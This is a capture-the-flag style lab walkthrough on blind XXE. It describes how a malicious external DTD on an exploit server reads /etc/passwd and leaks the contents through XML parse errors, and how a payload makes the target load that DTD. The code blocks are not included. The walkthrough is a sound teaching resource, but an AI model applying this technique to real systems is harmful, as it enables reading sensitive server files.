Exploiting blind XXE to retrieve data via error messages
PreviousExploiting blind XXE to exfiltrate data using a malicious external DTDNextExploiting XInclude to retrieve files
Last updated
Was this helpful?
Last updated
Was this helpful?
the lab has a "check stock" feature that parses XML input
send to repeater
To exploit that, we can trigger an XML parsing error, and the error message contains the sensitive data, like /etc/passwd.
In the lab, we have an exploit server, which allows us to host a malicious external DTD:
You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
This DTD carries out the following steps:
Define an XML parameter entity called file, containing the contents of the /etc/passwd file.
Define an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called error. The error entity will be evaluated by loading a nonexistent file whose name contains the value of the file entity.
Use the eval entity, which causes the dynamic declaration of the error entity to be performed.
Use the error entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd file.
now click on view exploit and copy the url which we will use to invoke the DTD
Next, to let the target server invoke our malicious external DTD, we can send the following XXE payload:
Which will:
Define an an XML parameter entity called xxe, which fetches our exploit server’s malicious DTD and interpret it inline
now let's go the "check store" request that we have sent to repeater and send this xml payload to invoke the malicious DTD stored in our exploit server
and we have solved the lab
hope you found this walkthrough easy to understand and follow
Greeting From Sayonara
